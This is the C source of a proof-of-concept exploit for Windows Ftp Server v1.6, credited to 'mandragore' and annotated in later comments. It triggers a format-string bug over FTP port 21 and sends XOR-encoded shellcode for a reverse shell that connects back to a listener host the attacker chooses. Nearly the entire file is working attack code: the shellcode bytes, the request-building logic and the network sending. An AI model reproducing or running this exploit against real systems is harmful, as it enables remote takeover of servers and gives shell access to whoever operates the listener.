
  1. /*
  2.  
  3. date:           12 janv 2004
  4. subject:        PoC exploit for Windows Ftp Server v1.6
  5. vendor:         http://srv.nease.net
  6. credits:        Peter Winter-Smith for the bug discovery
  7. shellcode:      reverse shell (~ 200 bytes)
  8. notes:          universal with respect to the NT version, but tied to this specific WinFTPServer.exe v1.6 build (the shellcode uses fixed IAT offsets and a fixed MFC42.DLL address, see the comments on sc[] and `where`), 2nd version of this exploit
  9. greets:         rosecurity team
  10. author:         mandragore, sploiting@mandragore.solidshells.com
  11.  
  12. */
  13.  
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <errno.h>
#include <unistd.h>
#include <unistd.h>
#include <fcntl.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
  24.  
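/*
 * Payload that ends up being executed on the victim once the format-string
 * bug has redirected control.  Layout, with the offsets main() relies on
 * when it patches the listener in:
 *
 *   [0..16]   17 NOPs (landing pad)
 *   [17..34]  18-byte stub.  It embeds the literal 0x5f40382b -- the same
 *             address main() uses as `where` for its two %hn writes -- and
 *             appears to write the original words back there so MFC42.DLL
 *             does not crash after the hijack.
 *   [35..239] reverse shell, stored XOR 0x96.  main() copies the listener IP
 *             (XOR 0x96969696) to offset 35+0x53 and the port (XOR 0x9696, in
 *             network order) to offset 35+0x5a.  The first bytes look like a
 *             small decoder loop that undoes the XOR at run time.
 *   [240]     explicit 0x00 terminator, see below.
 *
 * main() treats this array as a C string when it appends it to the request,
 * so the array must end with a NUL (the original listing had none and
 * strlen() read past the end of the object) and no *other* byte may be 0x00,
 * or the request is cut short.  That also means a listener IP/port whose
 * XOR-0x96 encoding contains 0x00 cannot be used with this shellcode.
 */
unsigned char sc[]={
// some padding
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
// restore patched code in MFC42.DLL so it doesn't crash yet
0xBF,0x2B,0x38,0x40,0x5F,0x66,0xB8,0x53,0x8B,0x66,0xAB,0x47,0x66,0xB8,0x40,0xB1,0x66,0xAB,
// overoptimised reverse shell relying on offsets in the WinFTPServer.exe's IAT
0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xB7,0x80,0x36,0x96,0x46,0xE2,0xFA,
0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xF2,0xF1,0x19,0x90,0x96,0x96,0x28,0x1A,0x06,0xD7,
0x96,0xFE,0xA5,0xA4,0x96,0x96,0xFE,0xE1,0xE5,0xA4,0xC9,0xC2,0x69,0x83,0x06,0x06,
0xD7,0x96,0x01,0x0F,0xC4,0xC4,0xC4,0xC4,0xD4,0xC4,0xD4,0xC4,0x7E,0x9D,0x96,0x96,
0x96,0xC1,0xC5,0xD7,0xC5,0xF9,0xF5,0xFD,0xF3,0xE2,0xD7,0x96,0xC1,0x69,0x80,0x69,
0x46,0x05,0xFE,0xE9,0x96,0x96,0x97,0xFE,0x94,0x96,0x96,0x14,0x1D,0x52,0xFC,0x86,
0xC6,0xC5,0x7E,0x9E,0x96,0x96,0x96,0xF5,0xF9,0xF8,0xF8,0xF3,0xF5,0xE2,0x96,0xC1,
0x69,0x80,0x69,0x46,0xFC,0x86,0xCF,0x1D,0x6A,0xC1,0x95,0x6F,0xC1,0x65,0x3D,0x1D,
0xAA,0xB2,0x50,0x91,0xD2,0xF0,0x51,0xD1,0xBA,0x97,0x97,0x1F,0xC9,0xAE,0x1F,0xC9,
0xAA,0x1F,0xC9,0xD6,0xC6,0xC6,0xC6,0xFC,0x97,0xC6,0xC6,0x7E,0x92,0x96,0x96,0x96,
0xF5,0xFB,0xF2,0x96,0xC6,0x7E,0x99,0x96,0x96,0x96,0xD5,0xE4,0xF3,0xF7,0xE2,0xF3,
0xC6,0xE4,0xF9,0xF5,0xF3,0xE5,0xE5,0xD7,0x96,0xF2,0xF1,0x37,0xA6,0x96,0x1D,0xD6,
0x9A,0x1D,0xD6,0x8A,0x1D,0x96,0x69,0xE6,0x9E,0x69,0x80,0x69,0x46,
// explicit terminator: strlen()/strncat() in main() need it, it is never sent
0x00};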
  44.  
/*
 * Print the command-line synopsis to stdout and terminate the process with
 * exit status 1.  argv0 is the program name as invoked.  Never returns.
 */
void usage(char *argv0) {
        static const char *const option_help =
                "options:\n"
                " -h ip_host for the reversed shell (default 127.0.0.1)\n"
                " -p port for the reversed shell (default 80)\n\n";

        printf("usage: %s -d <ip_dest> [options]\n", argv0);
        fputs(option_help, stdout);
        exit(1);
}
  52.  
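/*
 * Store v as four little-endian bytes at dst.  The victim is x86, so the two
 * addresses at the head of the request must be little-endian regardless of
 * the attacker host's byte order (the original memcpy()'d a host int).
 */
static void put_le32(unsigned char *dst, uint32_t v) {
        dst[0] = (unsigned char)(v & 0xffu);
        dst[1] = (unsigned char)((v >> 8) & 0xffu);
        dst[2] = (unsigned char)((v >> 16) & 0xffu);
        dst[3] = (unsigned char)((v >> 24) & 0xffu);
}

/* Non-zero if any of the n bytes at p is 0x00. */
static int has_nul(const unsigned char *p, size_t n) {
        return memchr(p, 0, n) != NULL;
}

/*
 * Entry point.  Parses -d <target> [-h listener_ip] [-p listener_port],
 * patches the listener into sc[], builds the format-string request and
 * sends it to TCP/21 on the target.  Returns 0 once the request went out;
 * exits 1 on bad arguments, an unusable listener encoding, or a failed
 * allocation/socket call.
 */
int main(int argc, char **argv) {
        enum {
                FTP_PORT = 21,                  /* victim's FTP control port */
                BUFSZ = 4096,                   /* request buffer size */
                SC_HOST_OFF = 17 + 18 + 0x53,   /* listener IP slot in sc[] */
                SC_PORT_OFF = 17 + 18 + 0x5a    /* listener port slot in sc[] */
        };
        struct sockaddr_in saddr;
        struct in_addr show;
        in_addr_t target = 0;
        in_addr_t lhost = htonl(INADDR_LOOPBACK);   /* -h default 127.0.0.1 */
        int lport = 80;                             /* -p default */
        /*
         * Address the two %hn writes hit (first at `where`, second at
         * `where+3`) and the 16-bit values they are meant to deposit.  These
         * are fixed to the v1.6 binary / MFC42.DLL layout; the restore stub
         * in sc[] embeds the same 0x5f40382b.
         */
        uint32_t where = 0x5f40382b;
        const int val1 = 0xc283, val2 = 0xe2ff;
        /*
         * Distance the format string has to walk with %08x pops before it
         * reaches the addresses placed at the head of the request.  Author's
         * constants; no further documentation available.
         */
        const int delta = 0x11eeca8 - 0x11ee96c;
        const int npops = (delta - 1) / 4;
        unsigned char enc[6];       /* encoded port (2) followed by IP (4) */
        unsigned int port_enc;
        uint32_t host_enc;
        const unsigned char *nul;
        size_t sclen, len;
        unsigned char *buff;
        ssize_t sent;
        int s, i, n;

        printf("[%%] winftpserv v1.6 sploit by mandragore (v2)\n");

        if (argc < 2)
                usage(argv[0]);

        while ((i = getopt(argc, argv, "d:h:p:")) != -1) {
                switch (i) {
                case 'd':
                        target = inet_addr(optarg);
                        break;
                case 'h':
                        lhost = inet_addr(optarg);
                        break;
                case 'p': {
                        /* atoi() silently accepted junk and out-of-range ports */
                        char *end;
                        long v;
                        errno = 0;
                        v = strtol(optarg, &end, 10);
                        if (end == optarg || *end != '\0' || errno == ERANGE ||
                            v < 1 || v > 65535) {
                                fprintf(stderr, "[-] bad port: %s\n", optarg);
                                usage(argv[0]);
                        }
                        lport = (int)v;
                        break;
                }
                default:
                        usage(argv[0]);
                        break;
                }
        }

        /* -d is mandatory: without it the original connected to 0.0.0.0 */
        if (target == 0 || target == INADDR_NONE || lhost == INADDR_NONE)
                usage(argv[0]);

        show.s_addr = lhost;
        printf("[.] if working you'll have a shell on %s:%d .\n", inet_ntoa(show), lport);
        show.s_addr = target;
        printf("[.] launching attack on %s..\n", inet_ntoa(show));

        /*
         * Patch the listener into the reverse shell.  Both values are stored
         * XOR 0x96 in network byte order (the stub at the head of the shell
         * undoes the XOR).  The request below is handled as a C string, so
         * an encoded byte of 0x00 would truncate the shellcode -- refuse it
         * instead of sending a broken payload.
         */
        port_enc = (unsigned int)lport ^ 0x9696u;
        enc[0] = (unsigned char)((port_enc >> 8) & 0xffu);
        enc[1] = (unsigned char)(port_enc & 0xffu);
        host_enc = lhost ^ 0x96969696u;     /* in_addr_t is already network order */
        memcpy(enc + 2, &host_enc, 4);
        if (has_nul(enc, sizeof enc)) {
                fprintf(stderr, "[-] listener ip/port xor 0x96 contains a NUL byte, pick another one\n");
                exit(1);
        }
        if ((size_t)SC_PORT_OFF + 2 > sizeof sc || (size_t)SC_HOST_OFF + 4 > sizeof sc) {
                fprintf(stderr, "[-] shellcode too short for the host/port slots\n");
                exit(1);
        }
        memcpy(sc + SC_PORT_OFF, enc, 2);
        memcpy(sc + SC_HOST_OFF, enc + 2, 4);

        /* payload length = bytes up to the first NUL, bounded by the array */
        nul = memchr(sc, 0, sizeof sc);
        sclen = nul ? (size_t)(nul - sc) : sizeof sc;

        buff = calloc(1, BUFSZ);
        if (buff == NULL) {
                perror("[-] calloc()");
                exit(1);
        }
        if (12 + sclen + (size_t)npops * 4 + 64 > BUFSZ) {
                fprintf(stderr, "[-] request does not fit in %d bytes\n", BUFSZ);
                free(buff);
                exit(1);
        }

        /*
         * Request layout:
         *   where | "xyzy" | where+3 | shellcode | npops x "%08x" |
         *   "%0<pad1>x%hn%0<pad2>x%hn\r\n"
         * pad1/pad2 are chosen so the running character count equals val1
         * at the first %hn and val2 at the second; the -7 is the author's
         * correction and is kept as is.
         */
        len = 0;
        put_le32(buff + len, where);
        len += 4;
        memcpy(buff + len, "xyzy", 4);
        len += 4;
        put_le32(buff + len, where + 3);
        len += 4;
        memcpy(buff + len, sc, sclen);
        len += sclen;
        for (i = 0; i < npops; i++) {
                memcpy(buff + len, "%08x", 4);
                len += 4;
        }
        /* original sprintf()'d buff into itself, which is undefined behaviour */
        n = snprintf((char *)buff + len, BUFSZ - len, "%%0%dx%%hn%%0%dx%%hn\r\n",
                     val1 - (int)sclen - npops * 8 - 4 * 3 - 7, val2 - val1);
        if (n < 0 || (size_t)n >= BUFSZ - len) {
                fprintf(stderr, "[-] request trailer does not fit\n");
                free(buff);
                exit(1);
        }
        len += (size_t)n;

        memset(&saddr, 0, sizeof saddr);
        saddr.sin_family = AF_INET;
        saddr.sin_addr.s_addr = target;
        saddr.sin_port = htons(FTP_PORT);

        s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if (s == -1) {
                perror("[-] socket()");
                free(buff);
                exit(1);
        }
        if (connect(s, (struct sockaddr *)&saddr, sizeof(saddr)) == -1) {
                perror("[-] connect()");
                close(s);
                free(buff);
                exit(1);
        }

        sent = send(s, buff, len, 0);
        if (sent < 0) {
                perror("[-] send()");
                close(s);
                free(buff);
                exit(1);
        }
        if ((size_t)sent != len) {
                fprintf(stderr, "[-] send(): short write (%zu of %zu bytes)\n", (size_t)sent, len);
                close(s);
                free(buff);
                exit(1);
        }

        /* best effort: drain whatever the server answers before hanging up */
        if (recv(s, buff, 1024, 0) < 0)
                perror("[-] recv()");

        close(s);
        free(buff);

        printf("[+] done.\n");
        return 0;
}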